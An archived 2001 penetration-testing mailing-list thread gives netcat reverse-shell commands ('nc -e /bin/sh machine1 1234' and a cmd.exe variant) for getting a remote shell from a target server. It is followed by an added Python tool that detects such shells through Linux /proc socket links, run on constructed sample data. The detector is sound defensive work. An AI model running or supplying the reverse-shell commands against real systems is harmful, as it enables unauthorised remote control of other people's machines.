> -----Original Message-----
> From: Greg Ardpic [mailto:itbat_private]
> Sent: Saturday, September 22, 2001 14:52
> To: pen-testat_private
> Subject: Re: Server initiated remote shell
>
>
> On Fri, 21 Sep 2001, Bill Pennington wrote:
> > You want netcat, you can find it on packetstorm.
> >
> > What you will need to do first is build a CGI/ASP script to upload your
> > code, assuming you can't just tftp it from the internal system.
> >
> > Then on your box execute:
> >
> > nc -l -p 80
> >
> > On the remote server execute
> >
> > nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
> > whatever command interpreter is handy. You will then see a command prompt
> > appear on your local box.
> >
> > Sounds like the hard part will be getting netcat on the box. Good luck!
> >
>
> Does this work on unix machines? I have compiled netcat with
> -DGAPING_SECURITY_HOLE (so I could use the -e switch) but had no luck.
>

Trivially easy:

On machine1 (windows in this case)
nc -lp 1234

On machine2 (unix in this case)
nc -e /bin/sh machine1 1234

That's really all there is to it.
Machine1 could be unix too, with no change in the commands.

Best Regards,
Yonatan Bokovza
IT Security Consultant
Xpert Systems

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sun Sep 23 2001 - 11:01:19 PDT
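The thread above describes the plumbing behind a netcat `-e` shell: the spawned `/bin/sh` (or `cmd.exe`) gets its stdin/stdout/stderr attached to the connected TCP socket. On Linux that plumbing leaves a direct trace for the defender: `/proc/<pid>/fd/0` and `/proc/<pid>/fd/1` of a shell process resolve to `socket:[inode]` instead of a pty or a file, and the inode can be looked up in `/proc/net/tcp` to recover the peer address. The following is an added example from the detection side, not code from the mailing-list post or from the netcat project; the process snapshot and the `/proc/net/tcp` excerpt are constructed, and the function names, the shell-name list and the `10.0.0.1:1234` peer are assumptions for illustration.

```python
"""Flag shells whose standard streams are bound to a TCP socket (Linux /proc)."""
import os
import re
import socket
import struct
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Assumed set of interpreters worth checking; extend to taste.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str              # contents of /proc/<pid>/comm
    fds: Dict[int, str]    # fd number -> readlink(/proc/<pid>/fd/<n>)


@dataclass(frozen=True)
class Finding:
    pid: int
    ppid: int
    comm: str
    inode: int
    peer: Optional[str]    # "ip:port" when the inode is an established TCP socket


def parse_proc_net_tcp(text: str) -> Dict[int, str]:
    """Map socket inode -> remote "ip:port" from /proc/net/tcp text.

    Addresses are hex in host byte order (little-endian on x86), ports are
    big-endian hex; only ESTABLISHED sockets (st == 01) are kept.
    """
    peers: Dict[int, str] = {}
    for line in text.splitlines()[1:]:        # first line is the column header
        cols = line.split()
        if len(cols) < 10 or cols[3] != "01":
            continue
        rem_hex, port_hex = cols[2].split(":")
        ip = socket.inet_ntoa(struct.pack("<I", int(rem_hex, 16)))
        peers[int(cols[9])] = f"{ip}:{int(port_hex, 16)}"
    return peers


def find_socket_shells(procs: Iterable[Proc], peers: Dict[int, str]) -> List[Finding]:
    """Flag shells whose stdin and stdout are the *same* socket.

    Requiring both streams on one socket leaves ordinary pipelines (stdout to
    a pipe) and pty-backed login shells alone; it matches the nc -e layout.
    """
    findings = []
    for p in procs:
        if p.comm not in SHELL_NAMES:
            continue
        m0 = SOCKET_RE.match(p.fds.get(0, ""))
        m1 = SOCKET_RE.match(p.fds.get(1, ""))
        if m0 and m1 and m0.group(1) == m1.group(1):
            inode = int(m0.group(1))
            findings.append(Finding(p.pid, p.ppid, p.comm, inode, peers.get(inode)))
    return findings


def snapshot_live_proc() -> List[Proc]:
    """Build Proc records from a real Linux /proc tree; unreadable pids are skipped."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/status") as f:
                ppid = next(int(l.split()[1]) for l in f if l.startswith("PPid:"))
            fds = {int(fd): os.readlink(f"/proc/{pid}/fd/{fd}")
                   for fd in os.listdir(f"/proc/{pid}/fd")}
        except (OSError, StopIteration):
            continue
        procs.append(Proc(pid, ppid, comm, fds))
    return procs


# Constructed snapshot: a pty login shell, a pipeline, a listener process, and
# a shell whose fds 0-2 are the socket that process handed it (nc -e layout).
SAMPLE_PROCS = [
    Proc(1201, 1100, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    Proc(1330, 1201, "bash", {0: "/dev/pts/0", 1: "pipe:[5521]", 2: "/dev/pts/0"}),
    Proc(1339, 1, "nc", {0: "/dev/null", 1: "/dev/null", 3: "socket:[48213]"}),
    Proc(1340, 1339, "sh", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
]

# Constructed /proc/net/tcp excerpt: inode 48213 is 192.168.1.2 -> 10.0.0.1:1234,
# established; the second row is a LISTEN socket and is ignored.
SAMPLE_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0201A8C0:A3F6 0100000A:04D2 01 00000000:00000000 00:00000000 00000000  1000        0 48213 1 0000000000000000 20 4 30 10 -1
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21001 1 0000000000000000 100 0 0 10 0
"""


def scan(procs: Iterable[Proc] = SAMPLE_PROCS, net_tcp: str = SAMPLE_NET_TCP) -> List[Finding]:
    """Run the check over a snapshot; defaults to the constructed sample data."""
    return find_socket_shells(procs, parse_proc_net_tcp(net_tcp))


if __name__ == "__main__":
    for f in scan():
        print(f"pid {f.pid} ({f.comm}, parent {f.ppid}) has stdio on socket "
              f"{f.inode}, peer {f.peer or 'unknown'}")
```

On a live host, pass `snapshot_live_proc()` and the contents of `/proc/net/tcp` to `scan()` (root is needed to read other users' fd links). The parent pid in each finding is the next thing to look at, since in the `-e` layout it is the process that owned the socket first. The check covers only the Unix side of the thread; the Windows `cmd.exe` case leaves no `/proc` trace, and the equivalent evidence there is a `cmd.exe` whose parent is the netcat process and whose standard handles are sockets, which needs a different collector.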